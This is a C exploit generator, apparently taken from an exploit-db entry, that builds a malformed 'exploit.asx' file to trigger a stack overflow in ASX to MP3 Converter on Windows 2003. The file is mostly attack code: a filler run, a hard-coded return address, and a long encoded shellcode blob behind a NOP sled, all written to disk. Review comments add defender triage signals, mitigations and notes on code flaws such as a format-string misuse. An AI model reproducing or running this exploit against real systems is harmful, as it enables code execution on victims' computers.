/*
ASX to MP3 Converter SOF (stack overflow) - Ivan Ivanovic Ivanov Иван-дурак
недействительный 31337 Team
holahola ~ https://www.exploit-db.com/exploits/38382/
Winblows 2k3
*/
#include <stdio.h>
#include <windows.h>
#include <malloc.h>
/*
 * Generator for a malformed "exploit.asx" file (see the reference URL in the
 * file header). It assembles one heap buffer from three back-to-back segments:
 * 255 bytes of 0x41 filler, the 4-byte `retn` value, and the `shellcode`
 * array. The buffer is then handed to fprintf() as the format string.
 *
 * Defender notes:
 *  - The artefact is a .asx file whose body is a long run of one repeated byte
 *    rather than playlist markup; both the repeated-byte run and the mismatch
 *    with the expected ASX structure are usable triage signals.
 *  - `retn` is a fixed literal, so the technique relies on a known, stable
 *    address in the target process. NOTE(review): presumably tied to the OS
 *    named in the file header; ASLR and DEP are the mitigations aimed at
 *    exactly this pattern, and patching or removing the parser is the fix.
 *
 * Returns 0 unconditionally; no allocation or file error is reported.
 * NOTE(review): memcpy/memset/strlen are used but <string.h> is not in the
 * visible include list (it may arrive through <windows.h>; confirm).
 */
int main() {
int i;
/* 255-byte heap block for the filler segment. malloc() result is not checked. */
char *overwrite_offset = malloc(255);
/* i takes 0, 5, ..., 250: 51 copies of 5 bytes cover all 255 bytes with 0x41. */
for(i = 0; i < 255; i += 5) {
char padding[] = "\x41\x41\x41\x41\x41";
memcpy(overwrite_offset + i, padding, strlen(padding));
}
/* Zero the last byte of the block. _msize() is the MSVC CRT call reporting a
   heap block's size. NOTE(review): assumes it reports the 255 bytes requested. */
memset(overwrite_offset + _msize(overwrite_offset) - 1, 0x00, 1);
/* Hard-coded 4-byte value placed directly after the filler segment. */
char retn[] = "\x92\x72\x23\x74";
/* Opaque machine-code bytes; what they do cannot be established from this
   listing. NOTE(review): the bytes after the 0x90 run resemble a common
   FPU-based get-PC decoder stub, which suggests an encoded payload (unverified). */
char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" // NOP sled
"\xdb\xc8\xd9\x74\x24\xf4\xbd\xaf\x93\x43\xb4\x5e\x31\xc9\xb1"
"\x52\x31\x6e\x17\x83\xee\xfc\x03\xc1\x80\xa1\x41\xe1\x4f\xa7"
"\xaa\x19\x90\xc8\x23\xfc\xa1\xc8\x50\x75\x91\xf8\x13\xdb\x1e"
"\x72\x71\xcf\x95\xf6\x5e\xe0\x1e\xbc\xb8\xcf\x9f\xed\xf9\x4e"
"\x1c\xec\x2d\xb0\x1d\x3f\x20\xb1\x5a\x22\xc9\xe3\x33\x28\x7c"
"\x13\x37\x64\xbd\x98\x0b\x68\xc5\x7d\xdb\x8b\xe4\xd0\x57\xd2"
"\x26\xd3\xb4\x6e\x6f\xcb\xd9\x4b\x39\x60\x29\x27\xb8\xa0\x63"
"\xc8\x17\x8d\x4b\x3b\x69\xca\x6c\xa4\x1c\x22\x8f\x59\x27\xf1"
"\xed\x85\xa2\xe1\x56\x4d\x14\xcd\x67\x82\xc3\x86\x64\x6f\x87"
"\xc0\x68\x6e\x44\x7b\x94\xfb\x6b\xab\x1c\xbf\x4f\x6f\x44\x1b"
"\xf1\x36\x20\xca\x0e\x28\x8b\xb3\xaa\x23\x26\xa7\xc6\x6e\x2f"
"\x04\xeb\x90\xaf\x02\x7c\xe3\x9d\x8d\xd6\x6b\xae\x46\xf1\x6c"
"\xd1\x7c\x45\xe2\x2c\x7f\xb6\x2b\xeb\x2b\xe6\x43\xda\x53\x6d"
"\x93\xe3\x81\x22\xc3\x4b\x7a\x83\xb3\x2b\x2a\x6b\xd9\xa3\x15"
"\x8b\xe2\x69\x3e\x26\x19\xfa\xed\xa7\x55\x71\x85\xc5\x95\x84"
"\xed\x43\x73\xec\x01\x02\x2c\x99\xb8\x0f\xa6\x38\x44\x9a\xc3"
"\x7b\xce\x29\x34\x35\x27\x47\x26\xa2\xc7\x12\x14\x65\xd7\x88"
"\x30\xe9\x4a\x57\xc0\x64\x77\xc0\x97\x21\x49\x19\x7d\xdc\xf0"
"\xb3\x63\x1d\x64\xfb\x27\xfa\x55\x02\xa6\x8f\xe2\x20\xb8\x49"
"\xea\x6c\xec\x05\xbd\x3a\x5a\xe0\x17\x8d\x34\xba\xc4\x47\xd0"
"\x3b\x27\x58\xa6\x43\x62\x2e\x46\xf5\xdb\x77\x79\x3a\x8c\x7f"
"\x02\x26\x2c\x7f\xd9\xe2\x5c\xca\x43\x42\xf5\x93\x16\xd6\x98"
"\x23\xcd\x15\xa5\xa7\xe7\xe5\x52\xb7\x82\xe0\x1f\x7f\x7f\x99"
"\x30\xea\x7f\x0e\x30\x3f";
/* Total is exactly the sum of the three segment lengths. The size_t sum is
   narrowed to int, and no extra byte is reserved for a terminator. */
int buffer_size = _msize(overwrite_offset) + strlen(retn) + strlen(shellcode);
/* malloc() result is not checked before the copies below. */
char *buffer = malloc(buffer_size);
/* Lay the segments out contiguously: filler, then retn, then shellcode. */
memcpy(buffer, overwrite_offset, _msize(overwrite_offset));
memcpy(buffer + _msize(overwrite_offset), retn, strlen(retn));
memcpy(buffer + _msize(overwrite_offset) + strlen(retn), shellcode, strlen(shellcode));
/* Zeroes the final byte of the buffer, which is the last byte copied from shellcode. */
memset(buffer + buffer_size - 1, 0x00, 1);
FILE * fp;
/* Opened in text mode ("w") in the current directory. The result is not
   checked, so a failed open passes NULL to fprintf(). */
fp = fopen("exploit.asx","w");
/* NOTE(review): buffer is used as the format string (CERT FIO30-C pattern).
   What reaches disk is decided by fprintf's string handling, not by
   buffer_size; inspect the emitted file rather than assuming its layout. */
fprintf(fp, buffer);
/* fclose() return value is ignored; neither heap block is freed before exit. */
fclose(fp);
return 0;
}